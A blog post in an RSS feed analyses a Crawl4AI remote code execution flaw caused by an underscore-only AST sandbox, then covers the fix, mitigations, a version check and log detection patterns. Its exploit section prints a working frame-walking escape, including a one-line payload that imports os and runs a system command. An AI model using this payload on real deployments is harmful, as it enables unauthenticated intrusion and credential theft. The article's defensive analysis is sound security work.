<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Crawl4ai on RockB</title><link>https://baeseokjae.github.io/tags/crawl4ai/</link><description>Recent content in Crawl4ai on RockB</description><image><title>RockB</title><url>https://baeseokjae.github.io/images/og-default.png</url><link>https://baeseokjae.github.io/images/og-default.png</link></image><generator>Hugo</generator><language>en-us</language><lastBuildDate>Thu, 25 Jun 2026 00:00:00 +0000</lastBuildDate><atom:link href="https://baeseokjae.github.io/tags/crawl4ai/index.xml" rel="self" type="application/rss+xml"/><item><title>Crawl4AI Critical RCE Sandbox Escape 2026: CVE-2026-53753 (CVSS 9.8) — Pre-Auth RCE via AST Sandbox Escape</title><link>https://baeseokjae.github.io/posts/crawl4ai-rce-sandbox-escape-guide-2026/</link><pubDate>Thu, 25 Jun 2026 00:00:00 +0000</pubDate><guid>https://baeseokjae.github.io/posts/crawl4ai-rce-sandbox-escape-guide-2026/</guid><description>Complete technical guide to CVE-2026-53753 (CVSS 9.8): pre-auth RCE in Crawl4AI via AST sandbox escape using Python generator frame attributes. Root cau...</description><content:encoded><![CDATA[<p>Every Crawl4AI instance running version 0.8.6 or earlier with its default configuration is remotely exploitable with zero authentication. A single <code>POST /crawl</code> request carrying a crafted <code>JsonCssExtractionStrategy</code> schema is enough to escape the AST-based expression sandbox and execute arbitrary system commands inside the Docker container — no credentials, no prior access, no user interaction required. CVE-2026-53753 carries a CVSS 9.8 because the attack vector is network-based, the complexity is low, and the impact on confidentiality, integrity, and availability is total. 
The root cause is a three-line flaw in the <code>_safe_eval_expression()</code> function: its AST validator blocks only attribute names that start with an underscore, so it misses Python internals such as <code>gi_frame</code>, <code>f_back</code>, and <code>f_builtins</code>, which expose the full interpreter to anyone who knows how to walk the frame chain.</p>
<h2 id="crawl4ais-computed-fields-feature">Crawl4AI&rsquo;s Computed Fields Feature</h2>
<p>Crawl4AI is an open-source, LLM-friendly web crawler and scraper — think Firecrawl but self-hosted in Docker. It lets you define extraction schemas that describe how to parse crawled pages. One feature, <strong>computed fields</strong>, allows users to specify Python expressions that transform extracted data inline. When you define a schema like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>schema <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#e6db74">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;MyExtractionStrategy&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#e6db74">&#34;type&#34;</span>: <span style="color:#e6db74">&#34;json-css&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#e6db74">&#34;params&#34;</span>: {
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;computed_fields&#34;</span>: {
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;total&#34;</span>: <span style="color:#e6db74">&#34;price * quantity&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Crawl4AI evaluates the <code>total</code> expression at extraction time using <code>_safe_eval_expression()</code> — a function that parses the expression into an AST, walks the tree, and rejects any node that accesses attributes starting with <code>_</code>. The intent was to prevent access to Python internals like <code>__class__</code>, <code>__subclasses__</code>, and <code>__builtins__</code>, which are the usual building blocks of Python jail escapes.</p>
<p>The approach worked against naive payloads. You couldn&rsquo;t write <code>().__class__.__base__.__subclasses__()</code> because <code>__class__</code> starts with an underscore. But the security model assumed that the only dangerous attributes in Python are the ones that start with an underscore. That assumption was wrong.</p>
<h2 id="the-root-cause-blocking-underscores-is-not-enough">The Root Cause: Blocking Underscores Is Not Enough</h2>
<p>Here is the actual vulnerable function as it existed in Crawl4AI &lt;= 0.8.6:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e"># Vulnerable: Crawl4AI &lt;= 0.8.6</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> ast
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>_SAFE_EVAL_BUILTINS <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;str&#34;</span>, <span style="color:#e6db74">&#34;int&#34;</span>, <span style="color:#e6db74">&#34;float&#34;</span>, <span style="color:#e6db74">&#34;bool&#34;</span>, <span style="color:#e6db74">&#34;len&#34;</span>, <span style="color:#e6db74">&#34;abs&#34;</span>,
</span></span><span style="display:flex;"><span>                       <span style="color:#e6db74">&#34;min&#34;</span>, <span style="color:#e6db74">&#34;max&#34;</span>, <span style="color:#e6db74">&#34;sum&#34;</span>, <span style="color:#e6db74">&#34;round&#34;</span>, <span style="color:#e6db74">&#34;range&#34;</span>, <span style="color:#e6db74">&#34;sorted&#34;</span>,
</span></span><span style="display:flex;"><span>                       <span style="color:#e6db74">&#34;reversed&#34;</span>, <span style="color:#e6db74">&#34;enumerate&#34;</span>, <span style="color:#e6db74">&#34;zip&#34;</span>, <span style="color:#e6db74">&#34;map&#34;</span>, <span style="color:#e6db74">&#34;filter&#34;</span>,
</span></span><span style="display:flex;"><span>                       <span style="color:#e6db74">&#34;type&#34;</span>, <span style="color:#e6db74">&#34;isinstance&#34;</span>, <span style="color:#e6db74">&#34;issubclass&#34;</span>, <span style="color:#e6db74">&#34;hasattr&#34;</span>,
</span></span><span style="display:flex;"><span>                       <span style="color:#e6db74">&#34;getattr&#34;</span>, <span style="color:#e6db74">&#34;setattr&#34;</span>, <span style="color:#e6db74">&#34;dict&#34;</span>, <span style="color:#e6db74">&#34;list&#34;</span>, <span style="color:#e6db74">&#34;tuple&#34;</span>,
</span></span><span style="display:flex;"><span>                       <span style="color:#e6db74">&#34;set&#34;</span>, <span style="color:#e6db74">&#34;frozenset&#34;</span>, <span style="color:#e6db74">&#34;True&#34;</span>, <span style="color:#e6db74">&#34;False&#34;</span>, <span style="color:#e6db74">&#34;None&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">_safe_eval_expression</span>(expression, context):
</span></span><span style="display:flex;"><span>    tree <span style="color:#f92672">=</span> ast<span style="color:#f92672">.</span>parse(expression, mode<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;eval&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> node <span style="color:#f92672">in</span> ast<span style="color:#f92672">.</span>walk(tree):
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> isinstance(node, ast<span style="color:#f92672">.</span>Attribute):
</span></span><span style="display:flex;"><span>            <span style="color:#75715e"># Block only underscore-prefixed attributes</span>
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">if</span> node<span style="color:#f92672">.</span>attr<span style="color:#f92672">.</span>startswith(<span style="color:#e6db74">&#34;_&#34;</span>):
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">raise</span> <span style="color:#a6e22e">ValueError</span>(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Access to attribute &#39;</span><span style="color:#e6db74">{</span>node<span style="color:#f92672">.</span>attr<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39; is not allowed&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> isinstance(node, ast<span style="color:#f92672">.</span>Call):
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">if</span> isinstance(node<span style="color:#f92672">.</span>func, ast<span style="color:#f92672">.</span>Name):
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">if</span> node<span style="color:#f92672">.</span>func<span style="color:#f92672">.</span>id <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> _SAFE_EVAL_BUILTINS:
</span></span><span style="display:flex;"><span>                    <span style="color:#66d9ef">raise</span> <span style="color:#a6e22e">ValueError</span>(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Call to &#39;</span><span style="color:#e6db74">{</span>node<span style="color:#f92672">.</span>func<span style="color:#f92672">.</span>id<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39; is not allowed&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    code <span style="color:#f92672">=</span> compile(tree, <span style="color:#e6db74">&#34;&lt;string&gt;&#34;</span>, <span style="color:#e6db74">&#34;eval&#34;</span>)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> eval(code, {<span style="color:#e6db74">&#34;__builtins__&#34;</span>: {}}, context)
</span></span></code></pre></div><p>The AST walker blocks <code>__class__</code>, <code>__subclasses__</code>, <code>__builtins__</code>, and anything else with a leading underscore. It then passes an empty <code>__builtins__</code> dict to <code>eval()</code> as a second layer of defense. Two layers, both resting on the same flawed assumption: that every route to Python&rsquo;s internals goes through an underscore-prefixed name.</p>
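<p>The second layer can be tried in isolation. The sketch below is illustrative and not Crawl4AI code: <code>eval_without_builtins</code> is a hypothetical helper that mirrors only the final <code>eval()</code> call from the listing above. It shows what an empty <code>__builtins__</code> does stop, namely direct lookups of names such as <code>open</code>.</p>

```python
def eval_without_builtins(expression, context):
    """Evaluate an expression with an empty __builtins__ (hypothetical helper)."""
    return eval(expression, {"__builtins__": {}}, context)


# A legitimate computed field only needs the values supplied in the context.
print(eval_without_builtins("price * quantity", {"price": 3, "quantity": 4}))

# A direct reference to a builtin fails, because the name cannot be resolved.
try:
    eval_without_builtins("open('/etc/passwd')", {})
except NameError as exc:
    print("blocked:", exc)
```

<p>The restriction covers name lookups made by the expression itself. It says nothing about objects the expression can reach through attribute access.</p>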
<p>Python&rsquo;s generator and frame object attributes tell a different story:</p>
<table>
  <thead>
      <tr>
          <th>Attribute</th>
          <th>Object</th>
          <th>Starts with <code>_</code>?</th>
          <th>What It Exposes</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td><code>gi_frame</code></td>
          <td>generator</td>
          <td>No</td>
          <td>Current execution frame of a suspended generator</td>
      </tr>
      <tr>
          <td><code>f_back</code></td>
          <td>frame</td>
          <td>No</td>
          <td>Previous frame in the call stack</td>
      </tr>
      <tr>
          <td><code>f_builtins</code></td>
          <td>frame</td>
          <td>No</td>
          <td>The real <code>__builtins__</code> dict of that frame</td>
      </tr>
  </tbody>
</table>
<p>None of these start with an underscore, so they pass the AST validator without triggering any check. The <code>eval()</code> call sets <code>__builtins__</code> to <code>{}</code> for the evaluated expression only; the frames of Crawl4AI&rsquo;s own functions further up the call stack still expose the original, unrestricted builtins through <code>f_builtins</code>.</p>
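<p>The gap is easy to reproduce without running any payload. Here is a minimal sketch, assuming a hypothetical helper <code>rejected_attributes</code> that applies the same underscore-prefix test as the validator. It only parses the expression and never evaluates it.</p>

```python
import ast


def rejected_attributes(expression):
    """Attribute names an underscore-prefix blocklist would reject (hypothetical helper)."""
    tree = ast.parse(expression, mode="eval")
    return [
        node.attr
        for node in ast.walk(tree)
        if isinstance(node, ast.Attribute) and node.attr.startswith("_")
    ]


# The classic dunder chain is caught by the prefix test.
print(rejected_attributes("().__class__.__base__"))

# The frame-walking chain contains no underscore-prefixed attribute at all.
print(rejected_attributes("g.gi_frame.f_back.f_builtins"))
```

<p>The second call returns an empty list: from the validator&rsquo;s point of view, the expression is as harmless as <code>price * quantity</code>.</p>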
<h2 id="the-exploit-chain-from-expression-to-shell">The Exploit Chain: From Expression to Shell</h2>
<p>The exploit requires sending a <code>POST /crawl</code> request with a <code>JsonCssExtractionStrategy</code> that includes a computed field containing a malicious expression. The expression uses a generator to access <code>gi_frame</code>, then walks the frame chain via <code>f_back</code> until it reaches a frame that still has the real <code>f_builtins</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e"># Simple generator to get a frame object</span>
</span></span><span style="display:flex;"><span>gen <span style="color:#f92672">=</span> (<span style="color:#66d9ef">lambda</span>: (<span style="color:#66d9ef">yield</span>))()
</span></span><span style="display:flex;"><span>frame <span style="color:#f92672">=</span> gen<span style="color:#f92672">.</span>gi_frame
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Walk up the call stack until we find the real __builtins__</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">while</span> frame:
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> <span style="color:#e6db74">&#34;os&#34;</span> <span style="color:#f92672">in</span> frame<span style="color:#f92672">.</span>f_builtins <span style="color:#f92672">or</span> <span style="color:#e6db74">&#34;__import__&#34;</span> <span style="color:#f92672">in</span> frame<span style="color:#f92672">.</span>f_builtins:
</span></span><span style="display:flex;"><span>        real_builtins <span style="color:#f92672">=</span> frame<span style="color:#f92672">.</span>f_builtins
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">break</span>
</span></span><span style="display:flex;"><span>    frame <span style="color:#f92672">=</span> frame<span style="color:#f92672">.</span>f_back
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Now we have the real __import__</span>
</span></span><span style="display:flex;"><span>__import__ <span style="color:#f92672">=</span> real_builtins[<span style="color:#e6db74">&#34;__import__&#34;</span>]
</span></span><span style="display:flex;"><span>os <span style="color:#f92672">=</span> __import__(<span style="color:#e6db74">&#34;os&#34;</span>)
</span></span><span style="display:flex;"><span>os<span style="color:#f92672">.</span>system(<span style="color:#e6db74">&#34;id&#34;</span>)
</span></span></code></pre></div><p>In practice, this can be compressed into a single expression that fits inside a computed field schema:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>(<span style="color:#66d9ef">lambda</span> g: g<span style="color:#f92672">.</span>gi_frame<span style="color:#f92672">.</span>f_back<span style="color:#f92672">.</span>f_back<span style="color:#f92672">.</span>f_back<span style="color:#f92672">.</span>f_builtins[<span style="color:#e6db74">&#34;__import__&#34;</span>](<span style="color:#e6db74">&#34;os&#34;</span>)<span style="color:#f92672">.</span>system(<span style="color:#e6db74">&#34;id&#34;</span>))((<span style="color:#66d9ef">lambda</span>: (<span style="color:#66d9ef">yield</span>))())
</span></span></code></pre></div><p>The exact number of <code>f_back</code> hops depends on the call depth at evaluation time, but the pattern is consistent: create a generator, grab <code>gi_frame</code>, walk <code>f_back</code> until you reach a frame whose <code>f_builtins</code> contains <code>__import__</code>, then import <code>os</code> and execute commands. From there, the attacker can exfiltrate environment variables, read <code>~/.aws/credentials</code> or the Docker API socket, modify files, or pivot to the host.</p>
<p>The full attack requires no authentication because Crawl4AI&rsquo;s JWT authentication is <strong>disabled by default</strong> in all versions prior to 0.8.7. If you deployed Crawl4AI following the default Docker setup and exposed port 11235, your instance has been remotely reachable and exploitable since day one.</p>
<p>This vulnerability is particularly dangerous because Crawl4AI is often deployed by LLM application teams who want to give their agents web-browsing capability, and those teams are rarely security specialists. They run <code>docker run -p 11235:11235 unclecode/crawl4ai:latest</code>, the crawler works, and they move on. The instance then sits on a public cloud VM with a wide-open API endpoint that feeds request data to Python <code>eval()</code>: essentially a remote shell with extra steps.</p>
<h3 id="hardcoded-jwt-secret-compounds-the-problem">Hardcoded JWT Secret Compounds the Problem</h3>
<p>Even if you did enable JWT authentication by setting <code>CRAWL4AI_API_TOKEN</code>, a separate vulnerability, CVE-2026-56265 (CVSS 9.3), means the default signing key was hardcoded in the source code. An attacker who knows the default key can forge valid JWTs for any user and bypass authentication entirely. Together, these two CVEs mean that every Crawl4AI instance before 0.8.7 is exploitable by anyone who can reach its API port, regardless of authentication settings: either auth is off (CVE-2026-53753 hits the wire directly) or auth is bypassable (CVE-2026-56265 unlocks the same endpoint).</p>
<h2 id="how-the-fix-works">How the Fix Works</h2>
<p>Crawl4AI 0.8.7 removes <code>eval()</code> from the computed fields expression path entirely. Here is what changed:</p>
<p><strong>Primary fix:</strong> The <code>_safe_eval_expression()</code> function and <code>_SAFE_EVAL_BUILTINS</code> are deleted. Computed field expressions that look like Python code now log a warning and return a default value instead of evaluating. Users who need post-processing must supply a Python callable as the <code>function</code> key in the schema — SDK-only, not available via the JSON API.</p>
<p><strong>Secondary hardening:</strong> The <code>hook_manager</code> sandbox — a separate code execution path for plugin hooks — was hardened to strip <code>__builtins__</code>, <code>__loader__</code>, and <code>__spec__</code> from injected modules. Dangerous builtins like <code>getattr</code>, <code>setattr</code>, <code>type</code>, and <code>__build_class__</code> were removed from the allowlist.</p>
<p><strong>Tertiary defense:</strong> The <code>/config/dump</code> endpoint (another <code>eval()</code> sink) was migrated to JSON input with Pydantic validation, eliminating a secondary injection vector.</p>
<p>The commit that deleted <code>_safe_eval_expression()</code> is straightforward: about 40 lines removed, none replaced with another eval-based approach. This is the right fix. AST sandboxing in Python has a long history of failures, and attempts to implement a &ldquo;safe eval&rdquo; by walking the AST have repeatedly been bypassed. The language&rsquo;s object model is too rich, the frame introspection API too powerful, and the gap between &ldquo;what the AST walker sees&rdquo; and &ldquo;what the interpreter does&rdquo; too wide. The only correct fix is to not evaluate untrusted expressions at all.</p>
<h2 id="mitigation-steps">Mitigation Steps</h2>
<p><strong>Immediate:</strong></p>
<ol>
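<li>Upgrade to Crawl4AI 0.8.7 or later: <code>pip install --upgrade &#34;crawl4ai&gt;=0.8.7&#34;</code> (the quotes stop the shell from treating <code>&gt;</code> as an output redirect)</li>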
<li>If using Docker, pull the latest image with <code>docker pull unclecode/crawl4ai:latest</code>, then recreate the container; a running container keeps using the image it was started from.</li>
<li>If you cannot upgrade immediately, set <code>CRAWL4AI_API_TOKEN</code> to a strong random value <strong>and</strong> restrict network access to port 11235 via firewall rules — but note that CVE-2026-56265 means the token alone is not sufficient before 0.8.7.</li>
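<li>Audit your Crawl4AI instances for signs of compromise: check access logs for computed field schemas containing <code>gi_frame</code>, <code>f_back</code>, or <code>f_builtins</code>. Run <code>docker logs &lt;container&gt;</code> and grep for <code>ValueError: Access to attribute</code>; legitimate usage rarely triggers that error, so hits usually mean someone was probing the validator with underscore-prefixed names. A payload built only from <code>gi_frame</code>, <code>f_back</code>, and <code>f_builtins</code> never raises it, so a clean grep does not rule out compromise.</li>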
</ol>
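<p>To confirm which release a given Python environment actually has installed, a small check along these lines can help. It is a sketch that assumes the distribution is named <code>crawl4ai</code> (as in the <code>pip</code> command above); <code>release_tuple</code> and <code>is_patched</code> are hypothetical helpers that compare only the leading <code>major.minor.patch</code> numbers, so pre-release suffixes are ignored.</p>

```python
import re
from importlib.metadata import PackageNotFoundError, version

FIXED_RELEASE = (0, 8, 7)  # first release without the eval path, per this article


def release_tuple(version_text):
    """Turn '0.8.6' into (0, 8, 6); anything after the third number is ignored."""
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", version_text)
    if match is None:
        raise ValueError(f"unrecognised version string: {version_text!r}")
    return tuple(int(part) for part in match.groups())


def is_patched(version_text):
    """True when the version is 0.8.7 or later."""
    return release_tuple(version_text) >= FIXED_RELEASE


if __name__ == "__main__":
    try:
        installed = version("crawl4ai")
    except PackageNotFoundError:
        print("crawl4ai is not installed in this environment")
    else:
        status = "patched" if is_patched(installed) else "VULNERABLE"
        print(f"crawl4ai {installed}: {status}")
```

<p>Run it with the same interpreter that runs the crawler (inside the container, for Docker deployments); a check on the host says nothing about the image.</p>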
<p><strong>Architectural:</strong></p>
<ul>
<li>Do not expose Crawl4AI&rsquo;s API port to the public internet. Place it behind an authenticating reverse proxy (nginx with basic auth, or a Cloudflare Access tunnel).</li>
<li>Run Crawl4AI in an isolated Docker container with minimal capabilities: <code>--cap-drop=ALL</code>, <code>--read-only</code>, no <code>docker.sock</code> mount.</li>
<li>Evaluate whether you need computed fields at all. For most crawling workflows, post-processing extracted data in your application code is safer and more maintainable than inlining Python expressions in JSON schemas.</li>
<li>Monitor for related CVEs: CVE-2026-53754 (SSRF filter bypass via IPv6 transition forms, CVSS 7.5) and CVE-2026-53755 (SSRF via proxy_config manipulation, CVSS 8.6) affect the same release range and indicate a pattern of incomplete input validation in Crawl4AI.</li>
</ul>
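<p>Moving a computed field into application code is usually a few lines. The sketch below recreates the <code>total</code> field from the earlier schema on the client side. It assumes extracted rows arrive as dictionaries of strings, and <code>add_total</code> is a hypothetical helper, not part of Crawl4AI.</p>

```python
from decimal import Decimal


def add_total(row):
    """Return a copy of an extracted row with a 'total' field computed locally."""
    price = Decimal(str(row["price"]))
    quantity = int(row["quantity"])
    return {**row, "total": price * quantity}


# Hypothetical extraction result; real rows depend on your schema.
rows = [{"name": "widget", "price": "19.99", "quantity": "3"}]
for row in rows:
    print(add_total(row))
```

<p>The arithmetic is ordinary, reviewed code in your own repository, and nothing in the request body is ever interpreted as Python.</p>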
<p>For more on sandbox escape patterns in agent tooling, see the <a href="/posts/claude-code-network-sandbox-socks5-null-byte-bypass-guide-2026/">Claude Code SOCKS5 Null-Byte Bypass analysis</a>, which covers a similar parser-differential class in Anthropic&rsquo;s agent sandbox. The broader context of agent security boundaries is covered in the <a href="/posts/ai-agent-security-tools-2026/">AI Agent Security Tools Guide</a>.</p>
<h2 id="why-ast-sandboxes-keep-failing">Why AST Sandboxes Keep Failing</h2>
<p>This vulnerability is not Crawl4AI-specific; it is a recurring pattern in Python security. Restricted-<code>eval</code> and AST-based sandboxing has failed in Pillow (<code>PIL.ImageMath.eval</code>, CVE-2023-50447), smolagents (multiple sandbox escapes in <code>LocalPythonExecutor</code>), and countless CTF pyjail challenges. The fundamental problem is that Python&rsquo;s runtime does not distinguish between &ldquo;user code&rdquo; and &ldquo;system code&rdquo; at the object level. A frame&rsquo;s <code>f_builtins</code> is just a dict. A generator&rsquo;s <code>gi_frame</code> is just a pointer. There is no protection domain, no capability system, no membrane that controls what code can access what objects. The AST walker is a static analysis pass running against a dynamic language with first-class access to its own runtime, a mismatch that cannot be fixed with more blocklist entries.</p>
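<p>How much introspection surface sits outside the underscore namespace can be listed directly. This is a small CPython-specific sketch; <code>public_attributes</code> is a hypothetical helper, and <code>sys._getframe()</code> is used only to obtain a frame object to inspect.</p>

```python
import sys


def public_attributes(obj):
    """Names on obj that an underscore-prefix blocklist would let through."""
    return sorted(name for name in dir(obj) if not name.startswith("_"))


generator = (item for item in ())
frame = sys._getframe()

print("generator:", public_attributes(generator))
print("frame:", public_attributes(frame))
```

<p>On CPython the output includes <code>gi_frame</code> for the generator and <code>f_back</code>, <code>f_builtins</code>, and <code>f_globals</code> for the frame. A blocklist would have to enumerate every such name for every object type, in every interpreter version.</p>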
<p>Crawl4AI&rsquo;s maintainers made the correct call in 0.8.7: delete the eval path entirely, accept the feature loss, and tell users to use the SDK if they need computed fields. This is the only strategy that has proven durable in Python sandboxing.</p>
<h2 id="frequently-asked-questions">Frequently Asked Questions</h2>
<p><strong>Q: Does this vulnerability affect Crawl4AI instances with authentication enabled?</strong>
A: Yes. Even if you set <code>CRAWL4AI_API_TOKEN</code>, the default JWT signing key is hardcoded (CVE-2026-56265), enabling token forgery. The only fully mitigated configuration before 0.8.7 is one that is both authenticated and network-isolated — and even then, isolation is doing the heavy lifting.</p>
<p><strong>Q: Can I detect if my Crawl4AI instance has been compromised?</strong>
A: Check access logs for <code>POST /crawl</code> requests with unusually long or complex <code>computed_fields</code> entries. Look for generator syntax (<code>lambda: (yield)</code>), attribute chains (<code>gi_frame</code>, <code>f_back</code>), or string patterns resembling Python code. Also check for outbound connections from the container to unexpected destinations.</p>
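<p>A first-pass scan for those indicators can be scripted. The sketch below assumes your logs capture request bodies as text, one entry per line, which depends on your deployment. <code>suspicious_lines</code> and the sample log entries are hypothetical.</p>

```python
import re

# Indicators named in this article; extend the pattern for your own environment.
INDICATORS = re.compile(r"gi_frame|f_back|f_builtins|lambda\s*:\s*\(\s*yield\s*\)")


def suspicious_lines(lines):
    """Return (line_number, text) pairs for lines that contain an indicator."""
    return [
        (number, line.rstrip("\n"))
        for number, line in enumerate(lines, start=1)
        if INDICATORS.search(line)
    ]


# Hypothetical log excerpt; real log formats will differ.
sample_log = [
    'POST /crawl {"computed_fields": {"total": "price * quantity"}}\n',
    'POST /crawl {"computed_fields": {"x": "g.gi_frame.f_back"}}\n',
]
for number, text in suspicious_lines(sample_log):
    print(number, text)
```

<p>Because the function accepts any iterable of lines, an open file handle can be passed in place of <code>sample_log</code>. Treat a match as a reason to investigate, and an empty result as inconclusive: an attacker can encode or split these strings.</p>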
<p><strong>Q: Is there a workaround for computed fields after upgrading to 0.8.7?</strong>
A: The <code>function</code> key in extraction schemas still works, but only through the Python SDK — it is not available via the JSON API. You must use the <code>Crawl4AI</code> SDK client and pass callables directly. The JSON API&rsquo;s computed field feature is permanently removed in 0.8.7.</p>
]]></content:encoded></item></channel></rss>